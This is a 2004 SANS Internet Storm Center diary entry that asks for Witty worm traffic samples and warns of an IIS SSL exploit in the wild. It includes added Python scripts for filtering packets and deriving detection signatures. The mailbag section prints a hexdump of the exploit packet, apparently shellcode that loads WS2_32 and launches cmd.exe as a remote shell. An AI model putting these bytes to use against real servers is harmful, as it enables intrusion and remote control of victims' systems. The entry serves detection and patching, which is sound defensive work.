
SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2004-04-22



Witty Traffic Request / Mailbag

Published: 2004-04-22
Last Updated: 2004-04-23 01:17:46 UTC
by Pedro Bueno (Version: 1)
Witty Traffic Request
Witty came out 4 weeks ago. We do hear rumors of variants, but have no confirmation so far, and would like to request samples of any unusual traffic with source port 4000.
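The following is an added example for this traffic request; it is not ISC code. It decodes raw IPv4 packets with a UDP or TCP header behind them and reports only those whose transport-layer source port is 4000, which is what the diary asks for (a packet merely sent to destination port 4000 is not reported). The packets, addresses and payloads are constructed inline so that the script runs offline; the header builders leave checksums at zero for that reason.

```python
"""Flag IPv4 packets whose transport-layer source port is 4000.

Added example for this diary's Witty traffic request; not ISC code.
Sample packets are constructed inline (RFC 5737 documentation addresses).
"""
import socket
import struct

WATCH_SRC_PORT = 4000  # the source port the diary asks readers to watch for
IPPROTO_TCP, IPPROTO_UDP = 6, 17


def build_ipv4(src, dst, proto, segment):
    """Minimal 20-byte IPv4 header (no options) in front of a transport segment.
    Header checksum is left at zero: this is constructed test data only."""
    total_len = 20 + len(segment)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr + segment


def build_udp(sport, dport, data):
    """8-byte UDP header (checksum zero) followed by data."""
    return struct.pack("!HHHH", sport, dport, 8 + len(data), 0) + data


def build_tcp(sport, dport, data):
    """20-byte TCP header, data offset 5, flags PSH|ACK, checksum zero, then data."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0) + data


def decode(packet):
    """Summary dict for an IPv4/UDP or IPv4/TCP packet, or None when the packet
    is something else (wrong IP version, truncated header, other protocol)."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return None
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    if ihl < 20 or len(packet) < ihl or total_len < ihl:
        return None
    proto = packet[9]
    seg = packet[ihl:total_len]  # transport header plus payload
    if proto == IPPROTO_UDP and len(seg) >= 8:
        name, hdr_len = "udp", 8
    elif proto == IPPROTO_TCP and len(seg) >= 20:
        name, hdr_len = "tcp", (seg[12] >> 4) * 4
    else:
        return None
    sport, dport = struct.unpack("!HH", seg[:4])
    return {
        "src": socket.inet_ntoa(packet[12:16]),
        "dst": socket.inet_ntoa(packet[16:20]),
        "proto": name,
        "sport": sport,
        "dport": dport,
        "payload_len": max(len(seg) - hdr_len, 0),
    }


def find_source_port(packets, port=WATCH_SRC_PORT):
    """Summaries of the packets whose transport source port equals `port`."""
    hits = []
    for pkt in packets:
        info = decode(pkt)
        if info is not None and info["sport"] == port:
            hits.append(info)
    return hits


# Constructed sample traffic: two packets from source port 4000, one packet
# merely addressed to port 4000, and one non-IPv4 blob that must be skipped.
SAMPLE_PACKETS = [
    build_ipv4("192.0.2.10", "198.51.100.5", IPPROTO_UDP,
               build_udp(4000, 23456, b"constructed udp payload")),
    build_ipv4("192.0.2.11", "198.51.100.5", IPPROTO_TCP,
               build_tcp(4000, 80, b"GET / HTTP/1.0\r\n\r\n")),
    build_ipv4("192.0.2.12", "198.51.100.5", IPPROTO_UDP,
               build_udp(53, 4000, b"reply to port 4000")),  # destination 4000: not reported
    b"\x60" + b"\x00" * 39,                                    # IPv6-looking bytes: skipped
]

if __name__ == "__main__":
    for hit in find_source_port(SAMPLE_PACKETS):
        print("{proto} {src}:{sport} -> {dst}:{dport} payload={payload_len} bytes".format(**hit))
```

The summary line is the kind of record worth sending with a traffic sample: protocol, endpoints, ports and payload size. To run it over a real capture, feed `decode()` the IP-layer bytes of each frame (after stripping the link-layer header) instead of `SAMPLE_PACKETS`.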
Mailbag
Some users are already reporting the use of the IIS SSL exploit for remote compromise. However, there is no sign of a worm yet. The reports are currently based on one known tool, and this tool currently only targets English and German versions.
New tools are being released to exploit the TCP and MS SSL vulnerabilities. Now that some malware is 'open source' (e.g. Phatbot), it may be only a question of time before we see these exploits incorporated into it.

So, once again, patch your systems!
Reference: http://www.f-secure.com/weblog/
Sample Packet:
00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
BE 98 EB 23 7A 69 02 05 6C 59 F8 1D 9C DE 8C D1 ...#zi..lY......
4C 70 D4 03 F0 27 20 20 30 08 57 53 32 5F 33 32 Lp...' 0.WS2_32
2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 ED 2A .DLL........]..*
6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B 78 08 j0Yd...@..p...x.
8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B 1C 01 ._<.....[x...K..
F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB 31 C9 ..S$..SQR.[ ..1.
41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 84 C0 A1...4....1.....
75 F7 0F B6 45 05 8D 44 45 04 66 39 10 75 E1 66 u...E..DE.f9.u.f
31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 0C 4A 1.ZX^VPR+N.A...J
8B 04 88 01 F8 0F B6 4D 05 89 44 8D D8 FE 4D 05 .......M..D...M.
75 BE FE 4D 04 74 21 FE 4D 22 8D 5D 18 53 FF D0 u..M.t!.M".].S..
89 C7 6A 04 58 88 45 05 80 45 77 0A 8D 5D 74 80 ..j.X.E..Ew..]t.
6B 26 14 E9 78 FF FF FF 89 CE 31 DB 53 53 53 53 k&..x.....1.SSSS
56 46 56 FF D0 97 55 58 66 89 30 6A 10 55 57 FF VFV...UXf.0j.UW.
55 D4 4E 56 57 FF 55 CC 53 55 57 FF 55 D0 97 8D U.NVW.U.SUW.U...
45 88 50 FF 55 E4 55 55 FF 55 E8 8D 44 05 0C 94 E.P.U.UU.U..D...
53 68 2E 65 78 65 68 5C 63 6D 64 94 31 D2 8D 45 Sh.exeh\cmd.1..E
CC 94 57 57 57 53 53 FE C6 01 F2 52 94 8D 45 78 ..WWWSS....R..Ex
50 8D 45 88 50 B1 08 53 53 6A 10 FE CE 52 53 53 P.E.P..SSj...RSS
53 55 FF 55 EC 6A FF FF 55 E0 SU.U.j..U.
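As an added example (not ISC code), the script below turns the diary's hexdump format into bytes and shows how a defender would pull detection material out of it: the printable strings that stand out in the ASCII column ("THCOWNZIIS", "WS2_32") are constant byte sequences that a network content signature can key on. Only the first three lines of the sample packet are embedded, copied from the diary; the parser assumes the diary's layout of up to 16 hex pairs per line followed by an ASCII column, and the markers and test payloads are the author's own choice.

```python
"""Parse the diary's hexdump into bytes and derive a content check from it.

Added example, not ISC code. DIARY_DUMP holds the first three lines of the
sample packet shown in this diary, in the diary's own layout.
"""
import re

DIARY_DUMP = """\
00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
BE 98 EB 23 7A 69 02 05 6C 59 F8 1D 9C DE 8C D1 ...#zi..lY......
4C 70 D4 03 F0 27 20 20 30 08 57 53 32 5F 33 32 Lp...' 0.WS2_32
"""

HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")
BYTES_PER_LINE = 16


def parse_hexdump(text, width=BYTES_PER_LINE):
    """Bytes from a hexdump whose lines start with up to `width` hex pairs.

    Parsing of a line stops at the first token that is not a hex pair, or
    after `width` pairs, so the ASCII column is skipped. A short line whose
    ASCII column happens to begin with two hex digits would need a stricter
    rule (for example, checking the ASCII column length against the count)."""
    out = bytearray()
    for line in text.splitlines():
        pairs = []
        for tok in line.split():
            if len(pairs) == width or not HEX_PAIR.match(tok):
                break
            pairs.append(int(tok, 16))
        out.extend(pairs)
    return bytes(out)


def printable_strings(data, min_len=4):
    """Runs of at least `min_len` printable ASCII bytes, like the `strings` tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


# Marker strings visible in the diary's dump (author's choice of signature
# material); constant byte sequences like these are what a content match keys on.
MARKERS = (b"THCOWNZIIS", b"WS2_32")


def matched_markers(payload, markers=MARKERS):
    """Names of the markers that occur in a captured payload."""
    return [m.decode("ascii") for m in markers if m in payload]


if __name__ == "__main__":
    data = parse_hexdump(DIARY_DUMP)
    print(len(data), "bytes parsed")
    print("strings:", printable_strings(data))
    print("markers:", matched_markers(data))
```

The second marker, `WS2_32`, is the Winsock library name and appears in plenty of legitimate binaries, so on its own it is a weak signature; `THCOWNZIIS` is the distinctive one. Both are shown only to illustrate how the choice of a content signature follows from the bytes on the wire, and why each candidate string should be judged for how specific it is.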
---------------------------------------------------------------

Handler on duty: Pedro Bueno (bueno_AT_ieee.org)